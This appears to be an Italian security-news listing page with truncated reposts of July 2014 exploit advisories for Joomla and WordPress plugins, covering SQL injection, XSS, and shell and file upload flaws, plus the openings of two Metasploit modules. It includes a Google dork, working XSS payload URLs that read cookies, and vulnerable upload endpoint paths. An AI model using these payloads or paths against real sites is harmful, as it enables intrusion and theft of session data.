Joomla Youtube Gallery 4.1.7 SQL Injection

18 luglio 2014 - Fonte: http://www.mondounix.com
# Exploit Title: Joomla component com_youtubegallery - SQL Injection vulnerability
# Google Dork: inurl:index.php?option=com_youtubegallery
# Date: 15-07-2014
# Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com)
# Vendor Homepage: http://www.joomlaboat.com/youtube-gallery
# Software Link: http://www.joomlaboat.com/youtube-gallery
# Version: 4.x ( 3.x maybe)
# Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3
# CVE : CVE-2014-4960
 
Detail:
In line: 40, file: components\com_youtubegallery\models\gallery.php,
if parameter listid is int (or can cast to int), $listid and $themeid
will not santinized.
Source code:
40: if(JRequest::getInt('listid'))
41: {
42:        //Shadow Box
43:        $listid=JRequest::getVar('listid');
44:
45:
46:...

Leggi il seguito »

WordPress WPTouch Authenticated File Upload

16 luglio 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress WPTouch Authenticated File Upload',
      'Description'    => %q{
          The Wordpress WPTouch plugin contains an auhtenticated file upload
          vulnerability. A wp-nonce (CSRF token) is created on the backend index
          page and the same token is used on handling ajax file uploads through
          the...

Leggi il seguito »

WordPress DZS Video Gallery XSS / Path Disclosure / Command Execution

15 luglio 2014 - Fonte: http://www.mondounix.com
These are Cross-Site Scripting, Full path disclosure and OS Commanding 
vulnerabilities in plugin DZS Video Gallery for WordPress.
 
Earlier I've disclosed Content Spoofing and Cross-Site Scripting 
vulnerabilities in this plugin (http://securityvulns.ru/docs30871.html).
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are all versions of DZS Video Gallery for WordPress.
 
-------------------------
Affected vendors:
-------------------------
 
Digital Zoom Studio
http://digitalzoomstudio.net
 
----------
Details:
----------
 
Cross-Site Scripting (WASC-08):
 
http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?designrand=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
Full...

Leggi il seguito »

WordPress Tidio Gallery 1.1 Shell Upload / XSS

15 luglio 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://www.tidioelements.com/
 
# Software Link : http://downloads.wordpress.org/plugin/tidio-gallery.zip
 
# Date : 2014-07-14
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Location :  
 
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php -> XSS
 
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-post.php -> Upload Shell
 
 
######################
 
# Vulnerablity n°1:
 
XSS Reflected Unauthenticated
 
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="/><script>alert(1);</script>
 
#...

Leggi il seguito »

WordPress CopySafe PDF Protection 0.6 Shell Upload

15 luglio 2014 - Fonte: http://www.mondounix.com
##################################################################################################
#Exploit Title : Wordpress Plugin CopySafe PDF Protection Shell Upload 
vulnerability
#Author        : Jagriti Sahu
#Download Link : http://wordpress.org/support/plugin/wp-copysafe-pdf
#version affected :  0.6 and below
#Date          : 14/07/2014
#Discovered at : IndiShell Lab
#Love to       : Surbhi, Mradula and Harry
##################################################################################################
 
////////////////////////
/// Overview:
////////////////////////
  Wordpress Plugin CopySafe PDF Protection(upto version 0.6) suffers 
from unrestricted file upload vulnerability which allow an attacker to 
upload...

Leggi il seguito »

WordPress Compfight 1.4 Cross Site Scripting

12 luglio 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress Compfight 1.4 Authenticated Cross Site Scripting
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://wordpress.org/plugins/easy-banners/
 
# Software Link : http://downloads.wordpress.org/plugin/compfight.1.4.zip
 
# Date : 2014-07-03
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Location :  
http://localhost/wp-content/plugins/compfight/compfight-search.php
 
######################
 
# Vulnerable code :
 
  if (!$search_value) {
      $input_text = 'Enter Keyword(s)';
    } else {
      $input_text = $search_value;
    }
 
    if ($show_title) {
      $output .= '<h3 class="cf_search_title">Compfight</h3>';
...

Leggi il seguito »

WordPress Download Manager 2.6.8 Shell Upload

12 luglio 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : WordPress Download Manager 2.6.8 Shell Upload Vulnerability
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : www.wpdownloadmanager.com
 
# Software Link : http://downloads.wordpress.org/plugin/download-manager.zip
 
# Date : 2014-07-11
 
# Tested on : Linux / Mozilla Firefox / WordPress Download Manager 2.6.8 Free Version
#        
#             
 
######################
 
# Location : 
 
http://IP_VICTIM/wp-content/plugins/download-manager/wpdm-add-new-file.php
 
 
######################
 
# Description :
 
WordPress Download Manager 2.6.8 suffers from a remote shell upload vulnerability.
 
Author or Administrator...

Leggi il seguito »

WordPress BSK PDF Manager 1.3.2 SQL Injection

9 luglio 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/
 
# Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip
 
# Date : 2014-07-04
 
# Tested on : Windows 7 / Mozilla Firefox
#        Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0
 
######################
 
# Location :  
http://localhost/wp-content/plugins/compfight/compfight-search.php
 
######################
 
# Vulnerable code :
 
[claudio@localhost ~]$ grep -R GET bsk-pdf-manager/
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:         ...

Leggi il seguito »

WordPress NextGEN Gallery 2.0.63 Shell Upload

7 luglio 2014 - Fonte: http://www.mondounix.com
# Exploit Title: Wordpress NextGEN Gallery Plugin 2.0.63 Arbitrary File
Upload
# Author: SANTHO ( @s4n7h0 )
# Vendor Homepage: http://wordpress.org/plugins/nextgen-gallery/
# Category: WebApp / CMS / Wordpress
# Version: 2.0.63 and less
---------------------------------------------------
 
 
Vulnerability Tracking
======================
Reported to vendor : Fri, May 9, 2014 at 9:20 PM
Vendor Acknowledgement : Sat, May 10, 2014 at 2:36 AM
Vendor Informed about patch release (version 2.65) : Mon, May 19, 2014 at
7:54 PM
 
 
 
Vulnerability Details
=======================
POST
/index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name=
HTTP/1.1
Host: target_ip
User-Agent: Mozilla/5.0...

Leggi il seguito »

WordPress MailPoet (wysija-newsletters) Unauthenticated File Upload

7 luglio 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload',
      'Description'    => %q{
          The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.8
          is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme
          functionality to upload a...

Leggi il seguito »